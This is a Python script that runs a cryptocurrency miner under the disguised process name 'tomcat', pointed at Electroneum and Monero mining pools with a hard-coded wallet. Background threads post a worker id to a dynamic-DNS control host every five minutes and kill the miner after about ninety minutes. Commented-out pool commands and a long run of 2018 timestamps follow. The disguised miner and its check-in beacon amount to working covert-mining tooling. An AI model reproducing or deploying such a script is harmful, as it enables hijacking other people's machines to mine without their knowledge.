import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:18:02.160678
#2018-02-17 17:07:06.754355
#2018-02-17 18:55:01.407215
#2018-02-17 20:44:06.323380
#2018-02-17 22:31:01.929747
#2018-02-18 00:14:02.119059
#2018-02-18 02:05:06.580101
#2018-02-18 03:52:01.884582
#2018-02-18 05:41:04.584642
#2018-02-18 07:33:06.731700
#2018-02-18 09:21:04.903774
#2018-02-18 11:07:01.512120
#2018-02-18 12:54:01.258362
#2018-02-18 14:40:06.769688
#2018-02-18 16:29:06.296944
#2018-02-18 18:18:04.799741
#2018-02-18 20:04:05.576472
#2018-02-18 21:50:07.599894
#2018-02-18 23:39:04.801715
#2018-02-19 01:25:01.900647
#2018-02-19 03:14:04.187496
#2018-02-19 04:59:06.283436
#2018-02-19 06:43:04.323843
#2018-02-19 08:32:07.397271
#2018-02-19 10:21:08.510557
#2018-02-19 12:09:06.760356
#2018-02-19 13:56:08.658995
#2018-02-19 15:45:15.785221
#2018-02-19 17:34:07.220867
#2018-02-19 19:21:06.965999
#2018-02-19 21:08:06.593794
#2018-02-19 22:55:07.931283
#2018-02-20 00:39:07.927596
#2018-02-20 02:29:06.284958
#2018-02-20 04:20:04.305616
#2018-02-20 06:04:04.253193
#2018-02-20 07:49:04.074432
#2018-02-20 09:35:07.402295
#2018-02-20 11:19:06.489485
#2018-02-20 13:06:08.651482
#2018-02-20 14:51:01.863604
#2018-02-20 16:37:01.734452
#2018-02-20 18:24:08.983508
#2018-02-20 20:16:07.582484
#2018-02-20 22:02:06.731501
#2018-02-20 23:43:05.832890
#2018-02-21 01:28:04.181360
#2018-02-21 03:16:01.633810
#2018-02-21 05:03:05.375345
#2018-02-21 06:51:06.974521
#2018-02-21 08:37:05.445581
#2018-02-21 10:23:06.525504
#2018-02-21 12:11:04.488649
#2018-02-21 13:59:08.962556
#2018-02-21 15:44:01.584326
#2018-02-21 17:36:07.477842
#2018-02-21 19:21:02.060781
#2018-02-21 21:09:03.984364
#2018-02-21 22:55:07.323519
#2018-02-22 00:43:06.279199
#2018-02-22 02:32:01.406096
#2018-02-22 04:18:07.108229
#2018-02-22 06:03:07.148696
#2018-02-22 07:49:06.252126
#2018-02-22 09:38:04.302216
#2018-02-22 11:23:01.804914
#2018-02-22 13:09:01.603897
#2018-02-22 14:58:07.199590
#2018-02-22 16:44:12.189985
#2018-02-22 18:31:04.979086
#2018-02-22 20:23:06.486746
#2018-02-22 22:08:05.753412
#2018-02-22 23:54:01.743411
#2018-02-23 01:42:05.339626
#2018-02-23 03:29:02.055488
#2018-02-23 05:14:03.783889
#2018-02-23 06:59:05.774752
#2018-02-23 08:49:04.536940
#2018-02-23 11:07:04.165669
#2018-02-23 13:00:13.640661
#2018-02-23 14:44:06.570526
#2018-02-23 16:32:06.161582
#2018-02-23 18:19:03.811620
#2018-02-23 20:04:04.281583
#2018-02-23 21:47:06.194004
#2018-02-23 23:41:06.584438
#2018-02-24 01:29:04.882820
#2018-02-24 03:18:07.642396
#2018-02-24 05:03:03.741602
#2018-02-24 06:51:03.979425
#2018-02-24 08:42:07.401519
#2018-02-24 10:26:07.319617
#2018-02-24 12:21:01.888048
#2018-02-24 14:14:03.737359
#2018-02-24 16:01:05.278254
#2018-02-24 17:54:07.375019
#2018-02-24 19:42:02.200592
#2018-02-24 21:29:05.275122
#2018-02-25 00:14:01.294499
#2018-02-25 04:08:04.424427
#2018-02-25 07:38:06.385367